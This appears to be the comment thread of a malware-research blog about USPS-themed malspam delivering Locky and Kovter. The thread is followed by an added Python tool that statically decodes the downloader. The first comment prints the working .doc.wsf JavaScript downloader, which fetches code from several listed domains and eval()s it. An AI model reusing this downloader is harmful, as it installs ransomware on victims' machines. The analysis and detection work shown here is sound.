Comments

Spoofed USPS unable to deliver malspam continues to deliver Locky, Kovter and other malware — 6 Comments

  1. In the last two days, I have received two e-mails, each containing a compressed zip file that contains a .doc.wsf file.

    These mails were sent from different domains / e-mail addresses (gilbert.pennington@stagingpc.com and warren.butler@wijnvoorraad.nl), and both claimed to represent the USPS support management department.

    As an IT support and network infrastructure administration professional (and also because I work only within a Linux / open source based environment), I decompressed these files and had a look using LibreOffice (within a sandboxed, virtualised computer; I do not own and refuse to use any Microsoft products, and therefore do not use MS Word or any MS Windows operating system).

    I can confirm that the file does contain what looks like some JavaScript code. The file contains the code as displayed below:

    function rox() { return “7656238”; }; function
    gag() { return “Msxml2.XMLHTTP”; }; var x = new
    Array(“sabedoriaalternativa.pt”,”dcregs.org”,”inflation.us”,”acpu.com.br”,
    “bilderbergska.org”); function rov() { return “counter”; } function cou() {
    return “/”+rov()+”/?a=”; }; function fiv() { return “a”; }; function cay(z) { z
    = z.split(rox()); z = z.join(fiv()); eval(z); }; function boe() { return
    “&i=LZCbj-mu-KARAKsEbTN4GoA9ZAuPDVEoJkV1mzh4jkqy_tEsNBEm-r2H60bGCFIfnv-
    4uYqgZur5ybTDSvVUW7Mt”; }; function htt() { return “http://”; }; function sut()
    { return “1D9Hq8gb1bfLs9C1J3HbGW3KVXTDrCdYd4&m=”; }; function tog(x) { return
    htt() + x + cou() + sut() + rox() + boe(); }; for (var i=0; i<5; i++) { try {
    var e = new ActiveXObject(gag()); e.open("GET", tog(x[i]), false); e.send(); if
    (e.status == 200) { cay(e.responseText); break; }; } catch(e) { };
    };

    I am glad that I am an experienced IT professional who can easily identify spam mail (as well as being happy that I do not use MS Internet Explorer or MS Office, and therefore this script does not affect my workstation or any of my IT infrastructure).

    • Sorry Jesse, I disagree. These currently deliver 5 files: 2 are innocent PHP interpreters, 1 is a PHP file detailing the file extensions to encrypt, 1 is Kovter and 1 is Locky; see https://myonlinesecurity.co.uk/spoofed-fedex-and-usps-kovter-and-locky-sites/ for the latest details. There have been some versions delivering plain Nemucod ransomware, but I haven’t seen one of those in about 3 weeks. You will probably find different “affiliates” distribute different versions in different countries.

        • These are proving to be a complete pain in the ***. Fairly low levels of malspam emails, so they are not getting quickly picked up by spam filters and antivirus companies. They are just starting to wake up to them now, after 3 weeks of daily submissions. The emails have been used for so long that most users (and a lot of researchers) just bin them without even looking at them.
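A defender-side static parser for the downloader pattern quoted in the first comment, added here as an example (not code from the page, the commenter or the blog): it folds the string-returning getter functions into the URLs the retry loop would request and recovers the split/join marker the script applies to the response before eval(), without executing any of it. The embedded sample is constructed in the same shape with placeholder .invalid domains and IDs.

```python
import re

# Constructed sample in the same shape as the .doc.wsf downloader quoted in the
# first comment; domains and identifiers are placeholders, not the real ones.
SAMPLE = r'''
function rox() { return "7656238"; }; function gag() { return "Msxml2.XMLHTTP"; };
var x = new Array("one.example.invalid","two.example.invalid","three.example.invalid");
function rov() { return "counter"; } function cou() { return "/"+rov()+"/?a="; };
function fiv() { return "a"; }; function cay(z) { z = z.split(rox()); z = z.join(fiv()); eval(z); };
function boe() { return "&i=PLACEHOLDER_ID"; }; function htt() { return "http://"; };
function sut() { return "PLACEHOLDER_KEY&m="; };
function tog(x) { return htt() + x + cou() + sut() + rox() + boe(); };
for (var i=0; i<3; i++) { try { var e = new ActiveXObject(gag()); e.open("GET", tog(x[i]), false);
e.send(); if (e.status == 200) { cay(e.responseText); break; }; } catch(e) { }; };
'''

FUNC0 = re.compile(r'function\s+(\w+)\s*\(\s*\)\s*\{\s*return\s+(.+?);\s*\}')   # zero-arg string getters
FUNC1 = re.compile(r'function\s+(\w+)\s*\((\w+)\)\s*\{\s*return\s+(.+?);\s*\}')  # one-arg URL builder
ARRAY = re.compile(r'new\s+Array\(([^)]*)\)')                                     # the domain list
TOKEN = re.compile(r'"([^"]*)"|(\w+)\(\)|(\w+)')                                  # literal | call | name

def resolve(expr, funcs, bindings=None, depth=0):
    """Statically fold literals, zero-arg calls and bound names into one string; nothing is executed."""
    if depth > 20:
        raise ValueError("call chain too deep")
    parts = []
    for lit, call, name in TOKEN.findall(expr):
        if call:
            parts.append(resolve(funcs[call], funcs, bindings, depth + 1))
        elif name:
            parts.append((bindings or {})[name])
        else:
            parts.append(lit)
    return "".join(parts)

def recover_urls(src):
    """Rebuild every URL the retry loop would request, one per entry of the domain array."""
    funcs = dict(FUNC0.findall(src))
    _, param, body = FUNC1.search(src).groups()
    domains = re.findall(r'"([^"]*)"', ARRAY.search(src).group(1))
    return [resolve(body, funcs, {param: d}) for d in domains]

def stage2_transform(src):
    """Recover the (marker, replacement) split/join substitution applied to the response before eval()."""
    funcs = dict(FUNC0.findall(src))
    needle = re.search(r'\.split\((\w+)\(\)\)', src).group(1)
    repl = re.search(r'\.join\((\w+)\(\)\)', src).group(1)
    return resolve(funcs[needle], funcs), resolve(funcs[repl], funcs)
```

The recovered URLs and the marker substitution are what an analyst would feed into proxy and DNS log searches for the sample's callback attempts.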
